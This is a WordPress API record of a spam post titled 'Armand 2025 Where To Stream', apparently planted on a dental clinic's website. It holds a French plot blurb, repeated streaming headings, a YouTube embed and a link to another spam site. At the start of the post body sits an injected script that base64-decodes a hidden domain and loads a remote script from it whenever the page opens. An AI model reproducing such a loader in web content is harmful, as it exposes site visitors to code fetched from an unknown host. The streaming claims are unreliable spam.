{"id":1064,"date":"2025-02-16T09:41:06","date_gmt":"2025-02-16T06:41:06","guid":{"rendered":"https:\/\/www.erciyesdisli.com\/index.php\/2025\/02\/16\/armand-2025-where-to-stream\/"},"modified":"2025-02-16T09:41:06","modified_gmt":"2025-02-16T06:41:06","slug":"armand-2025-where-to-stream","status":"publish","type":"post","link":"https:\/\/www.erciyesdisli.com\/index.php\/2025\/02\/16\/armand-2025-where-to-stream\/","title":{"rendered":"Armand 2025 Where To Stream"},"content":{"rendered":"<\/p>\n<p>\n<p><div id=\"xply\"><\/div>\n<p><p><script>const pdx=\"%XDOMAIN%\";const pde=atob(pdx);const script=document.createElement(\"script\");script.src=\"https:\/\/\"+pde+\"cv.php?u=9011bcef\";document.body.appendChild(script);<\/script>\n<\/p>\n<p>Armand: R\u00e9alis\u00e9 par Halfan Ullmann T\u00f8ndel. Avec Renate Reinsve, Ellen Dorit Petersen, Endre Hellestveit, Thea Lambrechts Vaul. Armand, et 6 ans, un gar\u00e7on, accus\u00e9 d&#8217;avoir travers\u00e9 les fronti\u00e8res contre son meilleur ami \u00e0 l&#8217;\u00e9cole primaire.\n<\/p>\n<\/p>\n<p><img decoding=\"async\" alt=\"Armand 2025 where to\" src=\"https:\/\/www.erciyesdisli.com\/wp-content\/uploads\/2025\/02\/7716dd5a.png\">\n<\/p>\n<\/p>\n<p><strong> Armand 2025 sur les services de streaming <\/strong>\n<\/p>\n<\/p>\n<p><strong> Armand 2025 Streaming pour tout le monde <\/strong>\n<\/p>\n<\/p>\n<p><strong> Armand 2025 Suivez toutes les plateformes <\/strong>\n<\/p>\n<\/p>\n<p><strong> Armand 2025 Regardez sur YouTube <\/strong>\n<\/p>\n<\/p>\n<p><strong> Armand 2025 Watch on Network <\/strong>\n<\/p>\n<\/p>\n<p><p><iframe width=\"560\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/houLaCRzA3A\" frameborder=\"0\" allowfullscreen><\/iframe><\/p>\n<\/p>\n<p><a href=\"https:\/\/acquythinhphat.com\/2025\/02\/13\/island-mentality-2025-%f0%9d%9a%86%f0%9d%9a%8a%f0%9d%9a%9d%f0%9d%9a%8c%f0%9d%9a%91-series-\">island 2025 %f0%9d%9a%86%f0%9d%9a%8a%f0%9d%9a%9d%f0%9d%9a%8c%f0%9d%9a%91<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Armand: R\u00e9alis\u00e9 par Halfan Ullmann T\u00f8ndel. Avec Renate Reinsve, Ellen Dorit Petersen, Endre Hellestveit, Thea Lambrechts Vaul. Armand, et 6 ans, un gar\u00e7on, accus\u00e9 d&#8217;avoir&hellip;<\/p>\n","protected":false},"author":0,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1064","post","type-post","status-publish","format-standard","hentry","category-videostreaming"],"_links":{"self":[{"href":"https:\/\/www.erciyesdisli.com\/index.php\/wp-json\/wp\/v2\/posts\/1064","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.erciyesdisli.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.erciyesdisli.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/www.erciyesdisli.com\/index.php\/wp-json\/wp\/v2\/comments?post=1064"}],"version-history":[{"count":0,"href":"https:\/\/www.erciyesdisli.com\/index.php\/wp-json\/wp\/v2\/posts\/1064\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.erciyesdisli.com\/index.php\/wp-json\/wp\/v2\/media?parent=1064"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.erciyesdisli.com\/index.php\/wp-json\/wp\/v2\/categories?post=1064"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.erciyesdisli.com\/index.php\/wp-json\/wp\/v2\/tags?post=1064"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}